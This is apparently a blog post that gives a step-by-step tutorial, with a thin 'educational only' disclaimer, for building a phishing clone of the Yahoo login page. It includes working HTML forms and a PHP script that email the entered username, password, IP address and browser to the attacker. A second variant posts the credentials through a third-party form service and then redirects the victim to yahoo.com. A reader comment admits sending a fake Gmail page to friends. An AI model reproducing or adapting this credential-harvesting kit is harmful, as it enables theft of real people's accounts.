How to make a phishing website- Know what hackers do

This Article Tells u what Hackers Do which is Known as Phishing, It is Completely Illegal never ever Try it.. This Article is meant for Educational Purpose !

This is how Bad Hackers make a fake login page(Completely Illegal) that will email you the name and password that is entered on that page.. To do this you will need some web language experiance.
First you will need to get a copy of the source code of the site. so go to the login page then click file > save as > and save the page as "html only" or right click and select "view source" then copy and past it to a notepad file on your desktop and save it as login.html. either way youl need a copy of the login.html on your desktop.
now you will need to make sure all of the images on the page are linking to a valid URL. what you need to do is look for links like


Code:

<img src=/pics/pic.jpg>

And they change them to

Code:

<img src=http://www.domain.com/pics/pic.jpg>

or save all the images and host them on your own image hosting account.
then check your page by opening it in your browser to make sure it looks like the real page with all the images showing up.
Now we have to enter the script that will mail us the name and pass. you have to look through your login.html and find the section of code that creates the login boxs and delete it. On Yahoo login this is the part of the source that needs to be replaced.

Code:

<table border="0" cellpadding="2" cellspacing="0"> <tr> <td align="right" nowrap><font face="arial" size="-1"> Yahoo! ID: </font></td> <td><input name="login" size="17" value=""></td> </tr> <tr> <td align="right" nowrap><font face="arial" size="-1">Password:</font></td> <td><input name="passwd" type="password" size="17" maxlength="32"></td></tr> <tr> <td colspan="2" nowrap align="center"><font face="arial" size="-1">


Now, this can be replaced by one of two things. If you understand PHP you could use a php mailing script as long as you have a host that allows the mail function or an apache server to host it on. Using php require 2 files. the login.html and thanks.php To use php replace the previous login script shown above with the following html.

Code:

<html> <form method="POST" action="thanks.php"> Yahoo! ID <input type="TEXT" name="name"> <br> Password <input type="PASSWORD" name="password"> <br> <input type="SUBMIT" name="Submit" value="Login"> </form> </html>


And in the same folder put this script (unedited) to actually grab the entered info and mail it to you. thanks.php

Code:

<script LANGUAGE="php"> $email = $HTTP_POST_VARS[email]; $mailto = "Your Email Goes Here"; $mailsubj = "Form submission"; $mailhead = "From: $emailn"; reset ($HTTP_POST_VARS); $mailbody =$_SERVER['REQUEST_URI'] . "." .$_SERVER['HTTP_USER_AGENT'] . "." . "$REMOTE_ADDR.".".Values submitted from web site form:n"; while (list ($key, $val) = each ($HTTP_POST_VARS)) { $mailbody .= "$key : $valn"; } mail($mailto, $mailsubj, $mailbody, $mailhead); </SCRIPT>


They Call the second script thanks.php This script will sendHackers yuor name, password, ip, operating system, and browser type to you in the email.
Now the second method isnt as good but can be hosted on ANY host, all they need to do is allow html which all hosts do. so this method can be hosted on a geocities account. You need to go to /http://www.response-o-matic.com and get thier free email script that can be dropped into any html.
youl need to alter the script for it to work. i dont have an altered script at hand but if you guys dont have a host that allows php and the mail() function ill get the respocomatic script tomorow and edit it for you and post it here ready for you to drop straight ontop of the orriginal yahoo login code thats higlighted at the top of this page. its morning now and im tired lol.

This is the responcomatic code that you can drop over the login code on your login page. just enter your email
Code:

<HTML> <BODY BGCOLOR="#FFFFFF"> <FORM action="http://www.response-o-matic.com/cgi-bin/rom.pl" method="POST"> <H3><CENTER> <INPUT TYPE="hidden" NAME="your_email_address" VALUE="YOUR_EMAIL@DOMAIN.COM"> <INPUT TYPE="hidden" NAME="your_name" VALUE="password"> <INPUT TYPE="hidden" NAME="email_subject_line" VALUE="My Password"> <INPUT TYPE="hidden" NAME="required_fields" VALUE="your_email_address"> <INPUT TYPE="hidden" NAME="thank_you_title" VALUE="You are being redirected"> <INPUT TYPE="hidden" NAME="return_link_url" VALUE="http://www.yahoo.com"> <INPUT TYPE="hidden" NAME="return_link_name" VALUE="CLICK HERE"> <INPUT TYPE="hidden" NAME="background_color" VALUE="#000000"> <INPUT TYPE="hidden" NAME="text_color" VALUE="#000000"> <INPUT TYPE="hidden" NAME="link_color" VALUE="#FF0000"> <INPUT TYPE="hidden" NAME="visited_link_color" VALUE="#FF0000"> <INPUT TYPE="hidden" NAME="active_link_color" VALUE="#FF0000"> </CENTER></H3> <H4>&nbsp;</H4> <BLOCKQUOTE><P><TABLE BORDER=0 CELLSPACING=0> <TR> <TD WIDTH=116> <b>Yahoo Name</b> </TD><TD> <INPUT TYPE="text" NAME="visitor_name" VALUE="" SIZE=20> </TD></TR> <TR> <TD WIDTH=116> <b>Password</b> </TD><TD> <INPUT TYPE="password" NAME="visitor_email_address" VALUE="" SIZE=20> </TD></TR> </TABLE></P> <BLOCKQUOTE><P><INPUT TYPE="submit" NAME=Submit" VALUE="Login"></P></BLOCKQUOTE> <P>&nbsp;</P> </FORM> </BODY> </HTML>


Where it says YOUR_EMAIL@DOMAIN.COM Hackers change that to the email They want the pass to be sent. . this isnt the finished script it still needs some work but its pretty much all done.

1 comments:

rashid said...

would i be caught if i made a fake gmail page and send to my frnds as a prank......act. i hv done it and i am afraid that i have done something wrong.

plz help sir....what should i do now..??

Post a Comment

Sponsers